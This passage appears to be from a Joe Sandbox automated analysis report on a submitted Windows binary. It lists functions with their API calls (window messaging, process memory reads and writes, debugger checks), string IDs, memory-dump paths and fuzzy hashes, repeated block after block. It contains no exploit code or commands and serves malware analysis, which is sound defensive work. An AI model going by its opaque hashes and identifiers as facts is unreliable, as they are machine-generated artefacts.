                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 52c9e544161674018e869cdbbf3f111982af8016fd038476842154a321951b37
                                                            • Instruction ID: 3feba9361fefbc3c2232e8c1c377bfb10a964c2417b2774e42988cbdfec728d1
                                                            • Opcode Fuzzy Hash: 52c9e544161674018e869cdbbf3f111982af8016fd038476842154a321951b37
                                                            • Instruction Fuzzy Hash: F221D375A04209EFCF05CFA8D8408AA7BB5FB4C351B044559FD06E7360EA31ED65EBA0
                                                            Function 00D565B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00D5662C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u$button
                                                            • API String ID: 3850602802-1762282863
                                                            • Opcode ID: 41a03179a343b0bbc2bd0f4dece683e5622d9f4565bb20a4f85bd488ce7faf55
                                                            • Instruction ID: 48ea3343359a30cee753ecfb2769462453d06cdfea6d3293e4a0886517e816dd
                                                            • Opcode Fuzzy Hash: 41a03179a343b0bbc2bd0f4dece683e5622d9f4565bb20a4f85bd488ce7faf55
                                                            • Instruction Fuzzy Hash: 9911E172240205ABDF118F60CC51FEA376AEF08315F584618FE91A7190D776EC55AB30
                                                            Function 00D5788C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D578D8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d634339678db7e1dbdc298c70585907be54d47e25b17be715556919b3f916fed
                                                            • Instruction ID: 979e0b2722393ac6aaa25037a6ea956310de170086de8084906dd5911a3a00b4
                                                            • Opcode Fuzzy Hash: d634339678db7e1dbdc298c70585907be54d47e25b17be715556919b3f916fed
                                                            • Instruction Fuzzy Hash: D311AC30504744AFDB21CF249891AE7BBE9BF05311F20891DECAA87291DB7169499BB0
                                                            Function 00D294A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D29509
                                                            • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D2952E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MemoryProcessWrite
                                                            • String ID: @U=u
                                                            • API String ID: 1195347164-2594219639
                                                            • Opcode ID: c4fbd68242d3fd7107e12a119fa21065aeca11da3144e2e693b80dbb03fc3707
                                                            • Instruction ID: 2c60892e46c47b805835520e84568d6810e3279ca89907a85f26bfbc62117414
                                                            • Opcode Fuzzy Hash: c4fbd68242d3fd7107e12a119fa21065aeca11da3144e2e693b80dbb03fc3707
                                                            • Instruction Fuzzy Hash: BF012B32A01218ABDB11AF24EC46EEEBB78DB14310F00416AF915A71D1DB706D54CB70
                                                            Function 00D38D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 3901c4a526139b9a65eaf8bca0210a0130ccfe7718dab4a56c6498cfc57a9828
                                                            • Instruction ID: 2145211dd7fe61162bef5010b9235a8bfa67a600c43265ad5008913c2dd11996
                                                            • Opcode Fuzzy Hash: 3901c4a526139b9a65eaf8bca0210a0130ccfe7718dab4a56c6498cfc57a9828
                                                            • Instruction Fuzzy Hash: 1E01F9719042187EDB58CAA8DC16EFE7BF8DB11311F00419AF692D2181E874E6089760
                                                            Function 00D295D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00D295FB
                                                            • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00D2962E
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MemoryProcessRead_memmove
                                                            • String ID: @U=u
                                                            • API String ID: 339422723-2594219639
                                                            • Opcode ID: f9f84157253be28e94277b9ae017a283a79100cc99be220c4d9e28f15c69cb85
                                                            • Instruction ID: 4749a18a9ffdf17b540846bf9dafd1071c0827aed8d318ba60f184317f3d2f3f
                                                            • Opcode Fuzzy Hash: f9f84157253be28e94277b9ae017a283a79100cc99be220c4d9e28f15c69cb85
                                                            • Instruction Fuzzy Hash: 9E016175801118AFDB50AF50DC91EDA77BCFB24341F40C0AAF64996151DE310E89DBA0
                                                            Function 00D5C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00D0B93A,?,?,?), ref: 00D5C5F1
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00D5C5D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageProcSend
                                                            • String ID: @U=u
                                                            • API String ID: 982171247-2594219639
                                                            • Opcode ID: bebc42323b7c4adc48e7e34f8b902a4bdce2c4490c31040563cae83fc2c00524
                                                            • Instruction ID: 7da67b8f5838cff9ebf46cfc87ce4f15ca0d536a4983150265267862756188b2
                                                            • Opcode Fuzzy Hash: bebc42323b7c4adc48e7e34f8b902a4bdce2c4490c31040563cae83fc2c00524
                                                            • Instruction Fuzzy Hash: EA019231200314AFCF225F54DC44E6A3BA6FB85361F140525FE415B7A0DB31A905DB70
                                                            Function 00D2953C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2954C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29564
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 1010aaf6b12f69d92fa82f402b1115e65b7aff2cbff7ced4693d2aa02c6ea8a2
                                                            • Instruction ID: abb93b8fa8eefffca17eaa9c92e6b1728790533582d389312881a17013859912
                                                            • Opcode Fuzzy Hash: 1010aaf6b12f69d92fa82f402b1115e65b7aff2cbff7ced4693d2aa02c6ea8a2
                                                            • Instruction Fuzzy Hash: 2EE02B3534233176F2311625AC5AFD79E49DB98B65F140034BB01991D1C9D24D8282B0
                                                            Function 00D29CC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D29CD8
                                                            • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00D29D08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d8f70ce11549a2aa8955e7bc507d8bb852cad7403629230484eaa42a6c03b74e
                                                            • Instruction ID: 20cb91ee4c432406e4e72b2d40361506717246f7b3a2d9a8b0345273409d0166
                                                            • Opcode Fuzzy Hash: d8f70ce11549a2aa8955e7bc507d8bb852cad7403629230484eaa42a6c03b74e
                                                            • Instruction Fuzzy Hash: 5CF0A036240324BFEA116B90EC56FEA7B58EB28766F100025FB415E1E1D9E25C40A7B0
                                                            Function 00D34F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 298a8665a05ce6eb078976fd8d5712aff2582e3815f64e40ea02bb7d2a127854
                                                            • Instruction ID: f818fbb6cefd946b479f8243b7ef1bc7f608798b722e72c93ad6c1c2ee8ddab1
                                                            • Opcode Fuzzy Hash: 298a8665a05ce6eb078976fd8d5712aff2582e3815f64e40ea02bb7d2a127854
                                                            • Instruction Fuzzy Hash: FDE092326003282AD720AB99EC49AA7F7ACEB85B71F010067FD04D6151D960AA4587F1
                                                            Function 00D0B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D0B314: _memset.LIBCMT ref: 00D0B321
                                                              • Part of subcall function 00CF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D0B2F0,?,?,?,00CD100A), ref: 00CF0945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00CD100A), ref: 00D0B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CD100A), ref: 00D0B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D0B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 24a47d8ca96724e96c2c9b0d902615b239c4239aec728ad34d23376770c2b12d
                                                            • Instruction ID: 286b98de206606fbeac2737c7ed6ba1093f0fa7ca49633835ed81faf0a152cfd
                                                            • Opcode Fuzzy Hash: 24a47d8ca96724e96c2c9b0d902615b239c4239aec728ad34d23376770c2b12d
                                                            • Instruction Fuzzy Hash: 72E06DB02047408FE7209F28E8043567AE4AF00714F10896EE88AC7791E7B4E444CBB1
                                                            Function 00D11935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00D11775
                                                              • Part of subcall function 00D4BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00D1195E,?), ref: 00D4BFFE
                                                              • Part of subcall function 00D4BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D4C010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D1196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            • Opcode ID: ff1f4c8ffc1e1e9eff2d4d8029b17134c19dda6927e7b4a73ea1bca4ef482515
                                                            • Instruction ID: 781e6968287718f1058e4e551de9219a921709017fb7101b828a30ff3e02eb9c
                                                            • Opcode Fuzzy Hash: ff1f4c8ffc1e1e9eff2d4d8029b17134c19dda6927e7b4a73ea1bca4ef482515
                                                            • Instruction Fuzzy Hash: 18F0C974804209EFDB15DFA1D988AECBBF8AB18302F540096E202A6290DB718F85DF71
                                                            Function 00D55998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D559AE
                                                            • PostMessageW.USER32(00000000), ref: 00D559B5
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: e58ccf324f813539bc1f205323a6a6e4d442b18b69391731a9f52ab40b1f294c
                                                            • Instruction ID: 34f7a0f907f1a1b799d81b43729d6fb57de33542db8d9113b4d49f0159ef8fc4
                                                            • Opcode Fuzzy Hash: e58ccf324f813539bc1f205323a6a6e4d442b18b69391731a9f52ab40b1f294c
                                                            • Instruction Fuzzy Hash: 71D0C9353C0311BBE664BB70EC0BF976614AB05B52F000875B745EF2D0D9E0A800C678
                                                            Function 00D55964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D5596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D55981
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 153ea0bced6df0383f570831f78a77db3641f1e82002148a609a1c0ac026094b
                                                            • Instruction ID: abb5fce8addd1acb8e3bc0b8973e2bd366d7e5c583c125b8f3e99e3999ec056b
                                                            • Opcode Fuzzy Hash: 153ea0bced6df0383f570831f78a77db3641f1e82002148a609a1c0ac026094b
                                                            • Instruction Fuzzy Hash: C8D0C935384311BBE664BB70EC0BF976A14AB00B52F000875B749EF2D0D9E09800C674
                                                            Function 00D293DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D293E9
                                                            • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00D293F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: da174b7f9c7db6ad28024f0c728ef82f27007995013db377a74f98a90cc902d0
                                                            • Instruction ID: 6b203992e571482bbb03c138a4a07ec5343c7fd7beb6483851298dc0495116f0
                                                            • Opcode Fuzzy Hash: da174b7f9c7db6ad28024f0c728ef82f27007995013db377a74f98a90cc902d0
                                                            • Instruction Fuzzy Hash: 03C00231141380BAEA211B77AC0DD873E7DE7CAF52B11056CB611D91B586650095D634